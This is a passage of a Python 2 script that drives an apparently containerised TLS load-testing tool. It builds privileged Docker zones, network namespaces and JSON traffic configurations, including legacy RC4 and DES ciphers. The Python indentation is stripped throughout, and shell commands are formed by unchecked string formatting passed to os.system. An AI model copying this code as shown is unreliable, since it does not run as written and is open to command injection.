{'cipher_name' : 'TLS_AES_256_GCM_SHA384',
'cipher' : '{TLS_AES_256_GCM_SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '38.2',
'server_ip_prefix' : '128.2'
},
{'cipher_name' : 'TLS_CHACHA20_POLY1305_SHA256',
'cipher' : '{TLS_CHACHA20_POLY1305_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '39.2',
'server_ip_prefix' : '129.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '40.2',
'server_ip_prefix' : '130.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '41.2',
'server_ip_prefix' : '131.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '42.2',
'server_ip_prefix' : '132.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '43.2',
'server_ip_prefix' : '133.2'
},
{'cipher_name' : 'RC4-MD5',
'cipher' : '{RC4-MD5}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '44.2',
'server_ip_prefix' : '134.2'
},
{'cipher_name' : 'RC4-SHA',
'cipher' : '{RC4-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '45.2',
'server_ip_prefix' : '135.2'
},
{'cipher_name' : 'DES-CBC-SHA',
'cipher' : '{DES-CBC-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '46.2',
'server_ip_prefix' : '136.2'
},
{'cipher_name' : 'DES-CBC3-SHA',
'cipher' : '{DES-CBC3-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '47.2',
'server_ip_prefix' : '137.2'
},
{'cipher_name' : 'SEED-SHA',
'cipher' : '{SEED-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '48.2',
'server_ip_prefix' : '138.2'}
]
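# Illustrative helper (hypothetical, not used by the original script): resolve an
# entry in supported_ciphers by its OpenSSL cipher name; returns None if unknown.
def find_cipher_entry(cipher_name):
    for entry in supported_ciphers:
        if entry['cipher_name'] == cipher_name:
            return entry
    return None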
def start_containers(host_info, c_args):
rundir_map = "--volume={}:{}".format (c_args.host_rundir
, c_args.target_rundir)
srcdir_map = "--volume={}:{}".format (c_args.host_srcdir
, c_args.target_srcdir)
for z_index in range(host_info['cores']):
zone_cname = "tp-zone-{}".format (z_index+1)
cmd_str = "sudo docker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --network=bridge --privileged --name {} -it -d {} {} tlspack/tgen:latest /bin/bash".format (zone_cname, rundir_map, srcdir_map)
os.system (cmd_str)
for netdev in host_info['net_dev_list']:
cmd_str = "sudo ip link set dev {} up".format(netdev)
os.system (cmd_str)
cmd_str = "sudo docker network connect {} {}".format(host_info['net_macvlan_map'][netdev], zone_cname)
os.system (cmd_str)
def stop_containers(host_info, c_args):
for z_index in range(host_info['cores']):
zone_cname = "tp-zone-{}".format (z_index+1)
cmd_str = "sudo docker rm -f {}".format (zone_cname)
os.system (cmd_str)
def restart_containers(host_info, c_args):
stop_containers(host_info, c_args)
start_containers(host_info, c_args)
def add_common_params (arg_parser):
arg_parser.add_argument('--sysinit'
, action="store_true"
, default=False
, help = 'sysinit')
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--target_rundir'
, action="store"
, default='/rundir'
, help = 'rundir path in container')
arg_parser.add_argument('--host_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'host_srcdir')
arg_parser.add_argument('--target_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'target_srcdir')
def add_common_start_params(arg_parser):
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
def add_traffic_params (arg_parser):
add_common_params (arg_parser)
add_common_start_params (arg_parser)
arg_parser.add_argument('--na'
, action="store"
, required=True
, dest='na_iface'
, help = 'na_iface name')
arg_parser.add_argument('--nb'
, action="store"
, required=True
, dest='nb_iface'
, help = 'nb_iface name')
arg_parser.add_argument('--zones'
, action="store"
, type=int
, default=1
, help = 'zones ')
arg_parser.add_argument('--cps'
, action="store"
, type=int
, required=True
, help = 'cps : 1 - 10000')
arg_parser.add_argument('--max_pipeline'
, action="store"
, type=int
, default=100
, help = 'max_pipeline : 1 - 10000')
arg_parser.add_argument('--max_active'
, action="store"
, type=int
, default=100
, help = 'max_active : 1 - 2000000')
arg_parser.add_argument('--cipher'
, action="store"
, help = 'cipher name'
, required=True)
arg_parser.add_argument('--sslv3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_2'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tcpdump'
, action="store"
, help = 'tcpdump options'
, default='-c 1000')
arg_parser.add_argument('--total_conn_count'
, action="store"
, type=int
, default=0
, help = 'total connection counts')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
arg_parser.add_argument('--app_next_write'
, action="store"
, type=int
, default=0
, help = 'app_next_write')
arg_parser.add_argument('--app_cs_data_len'
, action="store"
, type=int
, default=128
, help = 'app_cs_data_len')
arg_parser.add_argument('--app_sc_data_len'
, action="store"
, type=int
, default=128
, help = 'app_sc_data_len')
arg_parser.add_argument('--app_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'app_rcv_buff')
arg_parser.add_argument('--app_snd_buff'
, action="store"
, type=int
, default=0
, help = 'app_snd_buff')
arg_parser.add_argument('--tcp_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_rcv_buff')
arg_parser.add_argument('--tcp_snd_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_snd_buff')
arg_parser.add_argument('--app_cs_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_cs_starttls_len')
arg_parser.add_argument('--app_sc_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_sc_starttls_len')
arg_parser.add_argument('--port_begin'
, action="store"
, type=int
, default=5000
, help = 'port_begin')
def add_proxy_params (arg_parser):
add_common_params (arg_parser)
add_common_start_params (arg_parser)
arg_parser.add_argument('--proxy_traffic_vlan'
, action="store"
, type=int
, required=True
, help = '1-4095')
arg_parser.add_argument('--ta'
, action="store"
, required=True
, dest = 'ta_iface'
, help = 'ta host interface')
arg_parser.add_argument('--tb'
, action="store"
, required=True
, dest = 'tb_iface'
, help = 'tb host interface')
arg_parser.add_argument('--ta_macvlan'
, action="store"
, default=''
, help = 'ta host macvlan')
arg_parser.add_argument('--tb_macvlan'
, action="store"
, default=''
, help = 'tb host macvlan')
arg_parser.add_argument('--ta_iface_container'
, action="store"
, help = 'ta interface'
, default='eth1')
arg_parser.add_argument('--tb_iface_container'
, action="store"
, help = 'tb interface'
, default='eth2')
arg_parser.add_argument('--ta_subnet'
, action="store"
, help = 'ta subnet'
, required=True)
arg_parser.add_argument('--tb_subnet'
, action="store"
, help = 'tb subnet'
, required=True)
arg_parser.add_argument('--ta_tcpdump'
, action="store"
, help = 'ta tcpdump'
, default='-c 100')
arg_parser.add_argument('--tb_tcpdump'
, action="store"
, help = 'tb tcpdump'
, default='-c 100')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
def add_stop_params (arg_parser):
add_common_params (arg_parser)
def add_status_params(arg_parser):
add_common_params (arg_parser)
def add_enter_params (arg_parser):
add_common_params (arg_parser)
def add_exit_params (arg_parser):
add_common_params (arg_parser)
def zone_start_thread(host_info, c_args, zone, z_index):
zone_cname = "tp-zone-{}".format (z_index+1)
cmd_str = "sudo docker exec -d {} ip netns add {}".format(zone_cname, host_info['netns'])
os.system (cmd_str)
for netdev in host_info['net_iface_map'].values():
cmd_str = "sudo docker exec -d {} ip link set dev {} netns {}".format(zone_cname,
netdev,
host_info['netns'])
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/tlspack.exe /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/tlspack.exe".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/tlspack.py /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/tlspack.py".format(zone_cname)
os.system (cmd_str)
cfg_file = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'config.json')
cmd_ctrl_dir = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'cmdctl', zone['zone_label'])
result_dir = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'result', zone['zone_label'])
started_file = os.path.join (cmd_ctrl_dir, 'started.txt')
start_cmd_internal = '"ip netns exec {} /usr/local/bin/tlspack.exe {} {} {} {}"'.format (host_info['netns']
, result_dir.rstrip('/')
, started_file
, cfg_file
, z_index)
stop_cmd_internal = ''
for netdev in host_info['net_iface_map'].values():
cmd = ' "ip netns exec {} ip link set {} netns 1"'.format (host_info['netns'], netdev)
stop_cmd_internal += cmd
stop_cmd_internal += ' "ip netns del {}"'.format(host_info['netns'])
cmd_str = 'sudo docker exec -d {} python3 /usr/local/bin/tlspack.py {} {} {}'.format (zone_cname,
cmd_ctrl_dir,
start_cmd_internal,
stop_cmd_internal)
os.system (cmd_str)
cmd_ctrl_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag, 'cmdctl', zone['zone_label'])
started_file = os.path.join(cmd_ctrl_dir, 'started.txt')
finish_file = os.path.join (cmd_ctrl_dir, 'finish.txt')
while True:
time.sleep (1)
if os.path.exists (started_file) or os.path.exists (finish_file):
break
def start_traffic(host_info, c_args, traffic_s):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
if c_args.sysinit:
restart_containers (host_info, c_args)
os.system ("rm -rf {}".format (registry_dir))
# check if a config is already running
if os.path.exists(registry_file):
with open (registry_file) as f:
testname = f.read()
if testname == c_args.runtag:
print 'error: {} already running'.format (testname)
else:
print 'error: {} running'.format (testname)
sys.exit(1)
# create config dir; file
try:
cfg_j = json.loads (traffic_s)
traffic_s = json.dumps(cfg_j, indent=4)
except:
print traffic_s
sys.exit(1)
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag)
cfg_file = os.path.join(cfg_dir, 'config.json')
os.system ( 'rm -rf {}'.format(cfg_dir) )
os.system ( 'mkdir -p {}'.format(cfg_dir) )
with open(cfg_file, 'w') as f:
f.write(traffic_s)
# create registry entries
os.system ('mkdir -p {}'.format(registry_dir))
with open(registry_file, 'w') as f:
f.write(c_args.runtag)
for zone in cfg_j['zones']:
if not zone['enable']:
continue
is_app_enable = False
for app in zone['app_list']:
if app['enable']:
is_app_enable = True
break
if not is_app_enable:
continue
zone_file = os.path.join(registry_dir, zone['zone_label'])
with open(zone_file, 'w') as f:
f.write('0')
master_file = os.path.join(registry_dir, 'master')
with open(master_file, 'w') as f:
f.write('0')
# create cmd_ctrl entries
cmd_ctrl_dir = os.path.join(cfg_dir, 'cmdctl')
os.system ('rm -rf {}'.format(cmd_ctrl_dir))
os.system ('mkdir -p {}'.format(cmd_ctrl_dir))
for zone in cfg_j['zones']:
if not zone['enable']:
continue
zone_dir = os.path.join (cmd_ctrl_dir, zone['zone_label'])
os.system ('mkdir -p {}'.format(zone_dir))
# create result entries
result_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag, 'result')
os.system ('rm -rf {}'.format(result_dir))
os.system ('mkdir -p {}'.format(result_dir))
zone_map = {}
for zone in cfg_j['zones']:
if not zone['enable']:
continue
zone_map[zone['zone_label']] = False
zone_dir = os.path.join (result_dir, zone['zone_label'])
os.system ('mkdir -p {}'.format(zone_dir))
for app in zone['app_list']:
if not app['enable']:
continue
app_dir = os.path.join (zone_dir, app['app_label'])
os.system ('mkdir -p {}'.format(app_dir))
if app.get('srv_list'):
for srv in app['srv_list']:
if not srv['enable']:
continue
srv_dir = os.path.join (app_dir, srv['srv_label'])
os.system ('mkdir -p {}'.format(srv_dir))
if app.get('proxy_list'):
for proxy in app['proxy_list']:
if not proxy['enable']:
continue
proxy_dir = os.path.join (app_dir, proxy['proxy_label'])
os.system ('mkdir -p {}'.format(proxy_dir))
if app.get('cs_grp_list'):
for cs_grp in app['cs_grp_list']:
if not cs_grp['enable']:
continue
cs_grp_dir = os.path.join (app_dir, cs_grp['cs_grp_label'])
os.system ('mkdir -p {}'.format(cs_grp_dir))
# start zones
for netdev in host_info['net_dev_list']:
cmd_str = "sudo ip link set dev {} up".format(netdev)
os.system (cmd_str)
next_step = 0
while next_step < host_info['max_sequence']:
next_step += 1
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
if zone.get('step', 1) == next_step:
# zone_start_thread (host_info, c_args, zone, z_index)
thd = Thread(target=zone_start_thread, args=[host_info, c_args, zone, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
if z_threads:
for thd in z_threads:
thd.join()
time.sleep(1) #can be removed later
return (cfg_dir, result_dir)
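# Layout created under <host_rundir>/traffic/<runtag>/ by start_traffic() above:
#   config.json                           rendered traffic configuration
#   cmdctl/<zone_label>/                  started.txt / stop.txt / finish.txt control markers
#   result/<zone_label>/<app_label>/...   per-srv / per-proxy / per-cs_grp result directories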
def zone_stop_thread(host_info, c_args, zone, z_index):
cmd_ctrl_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag, 'cmdctl', zone['zone_label'])
stop_file = os.path.join(cmd_ctrl_dir, 'stop.txt')
while True:
time.sleep(1)
if os.path.exists (stop_file):
break
try:
with open (stop_file, 'w') as f:
f.write('1')
except:
pass
finish_file = os.path.join(cmd_ctrl_dir, 'finish.txt')
while True:
time.sleep (1)
if os.path.exists (finish_file):
break
def stop_traffic(host_info, c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
if c_args.sysinit:
restart_containers (host_info, c_args)
os.system ("rm -rf {}".format (registry_dir))
return
# check if a config is running
if not os.path.exists(registry_file):
print 'no test running'
sys.exit(1)
with open (registry_file) as f:
c_args.runtag = f.read()
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag)
cfg_file = os.path.join(cfg_dir, 'config.json')
try:
with open(cfg_file) as f:
cfg_j = json.load(f)
except:
print 'invalid config file'
sys.exit(1)
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
thd = Thread(target=zone_stop_thread, args=[host_info, c_args, zone, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
for thd in z_threads:
thd.join()
os.system ("rm -rf {}".format (registry_dir))
def show_traffic (host_info, c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
# check if a config is running
if os.path.exists(registry_file):
with open (registry_file) as f:
testname = f.read()
print '{} running'.format (testname)
else:
print 'no test running'
def is_traffic (c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry', 'one-app-mode')
registry_file = os.path.join(registry_dir, 'tag.txt')
if os.path.exists(registry_file):
return True
return False
def add_cps_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_cps_template (cmd_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "cps",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for zone_id in range(1, PARAMS.zones+1) %}
{
"zone_label" : "zone-{{zone_id}}-client",
"enable" : 1,
"step" : 2,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{zone_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{zone_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-client/init.pcap &"
]
}
,
{
"zone_label" : "zone-{{zone_id}}-server",
"enable" : 1,
"step" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"begin_cert_index" : {{zone_id*2000}},
"end_cert_index" : 100000,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-server/init.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if cmd_args.ecdsa_cert:
cmd_args.server_cert = '/rundir/certs/server2.cert'
cmd_args.server_key = '/rundir/certs/server2.key'
else:
cmd_args.server_cert = '/rundir/certs/server.cert'
cmd_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = cmd_args)
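# Aggregate the per-zone socket statistics written by a cps run: every
# zone-*-client / zone-*-server directory under result_dir contributes an
# ev_sockstats.json whose counters are summed key-by-key into
# ev_sockstats_client.json and ev_sockstats_server.json at the top of
# result_dir.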
def process_cps_stats(result_dir):
ev_sockstats_client_list = []
ev_sockstats_server_list = []
result_dir_contents = []
try:
result_dir_contents = os.listdir(result_dir)
except:
pass
for zone_dir in result_dir_contents:
zone_dir_path = os.path.join(result_dir, zone_dir)
if os.path.isdir(zone_dir_path):
ev_sockstats_json_file = os.path.join (zone_dir_path
, 'ev_sockstats.json')
try:
with open(ev_sockstats_json_file) as f:
stats_j = json.load(f)
if zone_dir.endswith('-client'):
ev_sockstats_client_list.append (stats_j)
if zone_dir.endswith('-server'):
ev_sockstats_server_list.append (stats_j)
except:
pass
if ev_sockstats_client_list:
ev_sockstats = ev_sockstats_client_list.pop()
while ev_sockstats_client_list:
next_ev_sockstats = ev_sockstats_client_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_client.json'), 'w') as f:
json.dump(ev_sockstats, f)
if ev_sockstats_server_list:
ev_sockstats = ev_sockstats_server_list.pop()
while ev_sockstats_server_list:
next_ev_sockstats = ev_sockstats_server_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_server.json'), 'w') as f:
json.dump(ev_sockstats, f)
def add_bw_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_bw_template (cmd_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "bw",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for zone_id in range(1, PARAMS.zones+1) %}
{
"zone_label" : "zone-{{zone_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "22.2{{zone_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "22.2{{zone_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 22.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 22.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-client/init.pcap &"
]
}
,
{
"zone_label" : "zone-{{zone_id}}-server",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
